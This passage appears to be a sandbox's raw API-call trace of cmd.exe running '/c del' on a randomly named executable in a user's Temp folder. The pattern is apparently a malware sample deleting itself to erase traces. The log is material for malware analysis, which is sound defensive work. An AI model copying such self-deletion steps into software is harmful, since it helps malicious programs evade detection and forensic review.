dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0114.014] GetConsoleOutputCP () returned 0x1b5 [0114.014] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe9f460 | out: lpCPInfo=0xe9f460) returned 1 [0114.015] SetConsoleCtrlHandler (HandlerRoutine=0xe90e40, Add=1) returned 1 [0114.015] _get_osfhandle (_FileHandle=1) returned 0x3c [0114.015] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0114.015] _get_osfhandle (_FileHandle=1) returned 0x3c [0114.015] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xe9f40c | out: lpMode=0xe9f40c) returned 1 [0114.015] _get_osfhandle (_FileHandle=1) returned 0x3c [0114.015] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0114.016] _get_osfhandle (_FileHandle=0) returned 0x38 [0114.016] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xe9f408 | out: lpMode=0xe9f408) returned 1 [0114.016] _get_osfhandle (_FileHandle=0) returned 0x38 [0114.016] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0114.016] GetEnvironmentStringsW () returned 0x707fc8* [0114.016] GetProcessHeap () returned 0x700000 [0114.016] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xb04) returned 0x708ad8 [0114.017] memcpy (in: _Dst=0x708ad8, _Src=0x707fc8, _Size=0xb04 | out: _Dst=0x708ad8) returned 0x708ad8 [0114.017] FreeEnvironmentStringsA (penv="=") returned 1 [0114.017] GetProcessHeap () returned 0x700000 [0114.017] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x4) returned 0x703620 [0114.017] GetEnvironmentStringsW () returned 0x707fc8* [0114.017] GetProcessHeap () returned 0x700000 [0114.017] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xb04) returned 0x7095e8 [0114.017] memcpy (in: _Dst=0x7095e8, _Src=0x707fc8, _Size=0xb04 | out: _Dst=0x7095e8) returned 0x7095e8 [0114.017] FreeEnvironmentStringsA (penv="=") returned 1 [0114.017] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0114.017] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0114.017] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0114.017] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0114.017] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0114.018] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0114.018] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0114.018] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0114.018] RegCloseKey (hKey=0x94) returned 0x0 [0114.018] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0114.018] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0114.018] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0114.018] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0114.018] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0114.018] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0114.018] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0114.018] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0114.018] RegCloseKey (hKey=0x94) returned 0x0 [0114.019] time (in: timer=0x0 | out: timer=0x0) returned 0x62739173 [0114.019] srand (_Seed=0x62739173) [0114.019] GetCommandLineW () returned="/c del \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe\"" [0114.019] GetCommandLineW () returned="/c del \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe\"" [0114.019] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xea7720 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.020] GetProcessHeap () returned 0x700000 [0114.020] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x210) returned 0x707fc8 [0114.020] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x707fd0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0114.020] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xe9f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0114.020] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xe9f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0114.020] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xe9f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.020] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0114.020] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0114.021] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0114.021] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0114.021] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0114.021] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0114.021] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0114.021] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0114.021] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0114.021] GetProcessHeap () returned 0x700000 [0114.022] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x708ad8) returned 1 [0114.022] GetEnvironmentStringsW () returned 0x7081e0* [0114.022] GetProcessHeap () returned 0x700000 [0114.023] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xb1c) returned 0x70ac20 [0114.023] memcpy (in: _Dst=0x70ac20, _Src=0x7081e0, _Size=0xb1c | out: _Dst=0x70ac20) returned 0x70ac20 [0114.023] FreeEnvironmentStringsA (penv="=") returned 1 [0114.023] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xe9f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0114.023] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xe9f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.024] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0114.024] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0114.024] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0114.024] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0114.024] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0114.024] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0114.024] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0114.024] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0114.024] GetProcessHeap () returned 0x700000 [0114.025] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x30) returned 0x707268 [0114.025] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x19fc4c*="system32") returned 0x13 [0114.025] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0114.025] FindFirstFileW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e2dd40, ftLastAccessTime.dwHighDateTime=0x1d85997, ftLastWriteTime.dwLowDateTime=0x6e2dd40, ftLastWriteTime.dwHighDateTime=0x1d85997, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x7073e0 [0114.026] FindClose (in: hFindFile=0x7073e0 | out: hFindFile=0x7073e0) returned 1 [0114.026] memcpy (in: _Dst=0x19fc5a, _Src=0x19f9fc, _Size=0xe | out: _Dst=0x19fc5a) returned 0x19fc5a [0114.026] FindFirstFileW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc99a46a3, ftLastAccessTime.dwHighDateTime=0x1d8596d, ftLastWriteTime.dwLowDateTime=0xc99a46a3, ftLastWriteTime.dwHighDateTime=0x1d8596d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x7073e0 [0114.026] FindClose (in: hFindFile=0x7073e0 | out: hFindFile=0x7073e0) returned 1 [0114.026] memcpy (in: _Dst=0x19fc6a, _Src=0x19f9fc, _Size=0x10 | out: _Dst=0x19fc6a) returned 0x19fc6a [0114.026] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0114.027] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0114.027] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0114.027] GetProcessHeap () returned 0x700000 [0114.027] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x70ac20) returned 1 [0114.028] GetEnvironmentStringsW () returned 0x70a0f8* [0114.028] GetProcessHeap () returned 0x700000 [0114.028] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xb4c) returned 0x70ac50 [0114.028] memcpy (in: _Dst=0x70ac50, _Src=0x70a0f8, _Size=0xb4c | out: _Dst=0x70ac50) returned 0x70ac50 [0114.028] FreeEnvironmentStringsA (penv="=") returned 1 [0114.028] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xea7720 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.028] GetProcessHeap () returned 0x700000 [0114.028] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x707268) returned 1 [0114.028] GetProcessHeap () returned 0x700000 [0114.028] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x400e) returned 0x70b7a8 [0114.128] GetProcessHeap () returned 0x700000 [0114.128] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x7e) returned 0x7073e0 [0114.128] GetProcessHeap () returned 0x700000 [0114.128] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x70b7a8) returned 1 [0114.129] GetConsoleOutputCP () returned 0x1b5 [0114.133] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe9f460 | out: lpCPInfo=0xe9f460) returned 1 [0114.133] GetUserDefaultLCID () returned 0x409 [0114.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xea34a0, cchData=8 | out: lpLCData=":") returned 2 [0114.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0114.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0114.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0114.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xea34b0, cchData=8 | out: lpLCData="/") returned 2 [0114.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xea3500, cchData=32 | out: lpLCData="Mon") returned 4 [0114.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xea3540, cchData=32 | out: lpLCData="Tue") returned 4 [0114.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xea3580, cchData=32 | out: lpLCData="Wed") returned 4 [0114.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xea35c0, cchData=32 | out: lpLCData="Thu") returned 4 [0114.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xea3600, cchData=32 | out: lpLCData="Fri") returned 4 [0114.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xea3640, cchData=32 | out: lpLCData="Sat") returned 4 [0114.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xea3680, cchData=32 | out: lpLCData="Sun") returned 4 [0114.134] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xea34c0, cchData=8 | out: lpLCData=".") returned 2 [0114.134] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xea34e0, cchData=8 | out: lpLCData=",") returned 2 [0114.134] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0114.136] GetProcessHeap () returned 0x700000 [0114.136] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x20c) returned 0x708d38 [0114.136] GetConsoleTitleW (in: lpConsoleTitle=0x708d38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0114.139] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76410000 [0114.139] GetProcAddress (hModule=0x76410000, lpProcName="CopyFileExW") returned 0x7642ffc0 [0114.139] GetProcAddress (hModule=0x76410000, lpProcName="IsDebuggerPresent") returned 0x7642b0b0 [0114.139] GetProcAddress (hModule=0x76410000, lpProcName="SetConsoleInputExeNameW") returned 0x7738b440 [0114.139] GetProcessHeap () returned 0x700000 [0114.139] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x400a) returned 0x70b7a8 [0114.139] GetProcessHeap () returned 0x700000 [0114.140] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x70b7a8) returned 1 [0114.140] _wcsicmp (_String1="del", _String2=")") returned 59 [0114.140] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0114.140] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0114.140] _wcsicmp (_String1="IF", _String2="del") returned 5 [0114.140] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0114.140] _wcsicmp (_String1="REM", _String2="del") returned 14 [0114.140] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0114.140] GetProcessHeap () returned 0x700000 [0114.140] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x58) returned 0x708f50 [0114.140] GetProcessHeap () returned 0x700000 [0114.140] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x10) returned 0x707268 [0114.142] GetProcessHeap () returned 0x700000 [0114.142] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x74) returned 0x708fb0 [0114.143] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0114.143] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0114.143] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0114.143] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0114.143] GetProcessHeap () returned 0x700000 [0114.143] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xe0) returned 0x709030 [0114.143] GetProcessHeap () returned 0x700000 [0114.143] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x709030, Size=0x74) returned 0x709030 [0114.143] GetProcessHeap () returned 0x700000 [0114.144] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x709030) returned 0x74 [0114.144] GetProcessHeap () returned 0x700000 [0114.144] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x7c) returned 0x7090b0 [0114.144] GetProcessHeap () returned 0x700000 [0114.144] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0xe0) returned 0x709138 [0114.145] GetProcessHeap () returned 0x700000 [0114.145] RtlReAllocateHeap (Heap=0x700000, Flags=0x0, Ptr=0x709138, Size=0x74) returned 0x709138 [0114.145] GetProcessHeap () returned 0x700000 [0114.145] RtlSizeHeap (HeapHandle=0x700000, Flags=0x0, MemoryPointer=0x709138) returned 0x74 [0114.145] GetProcessHeap () returned 0x700000 [0114.145] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x6e) returned 0x7091b8 [0114.145] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x19f818 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.145] GetProcessHeap () returned 0x700000 [0114.145] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x38) returned 0x707280 [0114.145] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x19e888 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.145] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x19eabc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x19eac0, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x19eabc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0114.145] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0114.145] GetProcessHeap () returned 0x700000 [0114.145] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x2c) returned 0x709230 [0114.145] GetProcessHeap () returned 0x700000 [0114.145] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x258) returned 0x709268 [0114.145] _wcsicmp (_String1="rysgtozci.exe", _String2=".") returned 68 [0114.146] _wcsicmp (_String1="rysgtozci.exe", _String2="..") returned 68 [0114.146] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rysgtozci.exe")) returned 0x20 [0114.146] GetProcessHeap () returned 0x700000 [0114.146] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x210) returned 0x7005c8 [0114.146] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7005d0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.146] SetErrorMode (uMode=0x0) returned 0x1 [0114.146] SetErrorMode (uMode=0x1) returned 0x0 [0114.146] GetFullPathNameW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe", nBufferLength=0x104, lpBuffer=0x19eee8, lpFilePart=0x19eebc | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe", lpFilePart=0x19eebc*="rysgtozci.exe") returned 0x32 [0114.146] SetErrorMode (uMode=0x1) returned 0x1 [0114.146] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0114.146] GetProcessHeap () returned 0x700000 [0114.146] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x258) returned 0x7007e0 [0114.147] _wcsicmp (_String1="rysgtozci.exe", _String2=".") returned 68 [0114.147] _wcsicmp (_String1="rysgtozci.exe", _String2="..") returned 68 [0114.147] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rysgtozci.exe")) returned 0x20 [0114.147] GetProcessHeap () returned 0x700000 [0114.147] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x24) returned 0x7094c8 [0114.147] GetProcessHeap () returned 0x700000 [0114.147] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x52) returned 0x7094f8 [0114.147] GetProcessHeap () returned 0x700000 [0114.147] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x52) returned 0x709558 [0114.147] GetProcessHeap () returned 0x700000 [0114.147] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x8, Size=0x808) returned 0x70a0f8 [0114.147] FindFirstFileExW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rysgtozci.exe"), fInfoLevelId=0x0, lpFindFileData=0x70a104, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x70a104) returned 0x70a908 [0114.147] GetProcessHeap () returned 0x700000 [0114.147] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x14) returned 0x707968 [0114.147] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0114.147] NtOpenFile (in: FileHandle=0x19edbc, DesiredAccess=0x10000, ObjectAttributes=0x19ed84*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rysgtozci.exe"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19edac, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x19edbc*=0xa4, IoStatusBlock=0x19edac*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0114.149] RtlReleaseRelativeName () returned 0x19ed9c [0114.149] RtlFreeAnsiString (AnsiString="\\") [0114.149] NtQueryVolumeInformationFile (in: FileHandle=0xa4, IoStatusBlock=0x19ece8, FsInformation=0x19ecf0, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x19ece8, FsInformation=0x19ecf0) returned 0x0 [0114.149] CloseHandle (hObject=0xa4) returned 1 [0114.150] FindNextFileW (in: hFindFile=0x70a908, lpFindFileData=0x70a104 | out: lpFindFileData=0x70a104*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40390f00, ftCreationTime.dwHighDateTime=0x1d86024, ftLastAccessTime.dwLowDateTime=0x17266e21, ftLastAccessTime.dwHighDateTime=0x1d8605e, ftLastWriteTime.dwLowDateTime=0x40390f00, ftLastWriteTime.dwHighDateTime=0x1d86024, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="rysgtozci.exe", cAlternateFileName="RYSGTO~1.EXE")) returned 0 [0114.151] GetLastError () returned 0x12 [0114.151] FindClose (in: hFindFile=0x70a908 | out: hFindFile=0x70a908) returned 1 [0114.152] GetProcessHeap () returned 0x700000 [0114.153] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x70a0f8) returned 1 [0114.153] GetProcessHeap () returned 0x700000 [0114.154] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x709558) returned 1 [0114.154] GetProcessHeap () returned 0x700000 [0114.154] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x7094c8) returned 1 [0114.154] GetProcessHeap () returned 0x700000 [0114.155] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x7094f8) returned 1 [0114.155] GetProcessHeap () returned 0x700000 [0114.155] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x7007e0) returned 1 [0114.155] GetProcessHeap () returned 0x700000 [0114.156] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x7005c8) returned 1 [0114.156] GetProcessHeap () returned 0x700000 [0114.156] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x709268) returned 1 [0114.157] GetProcessHeap () returned 0x700000 [0114.157] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x709230) returned 1 [0114.157] GetProcessHeap () returned 0x700000 [0114.157] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x707280) returned 1 [0114.157] GetProcessHeap () returned 0x700000 [0114.158] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x7091b8) returned 1 [0114.158] GetProcessHeap () returned 0x700000 [0114.159] RtlFreeHeap (HeapHandle=0x700000, Flags=0x0, BaseAddress=0x709138) returned 1 [0114.159] _get_osfhandle (_FileHandle=1) returned 0x3c [0114.159] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0114.160] _get_osfhandle (_FileHandle=1) returned 0x3c [0114.160] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xe9f40c | out: lpMode=0xe9f40c) returned 1 [0114.160] _get_osfhandle (_FileHandle=0) returned 0x38 [0114.160] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xe9f408 | out: lpMode=0xe9f408) returned 1 [0114.161] SetConsoleInputExeNameW () returned 0x1 [0114.161] GetConsoleOutputCP () returned 0x1b5 [0114.161] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe9f460 | out: lpCPInfo=0xe9f460) returned 1 [0114.161] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.161] exit (_Code=0) Thread: id = 64 os_tid = 0x5d4 Process: id = "7" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x72671000" os_pid = "0x418" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = 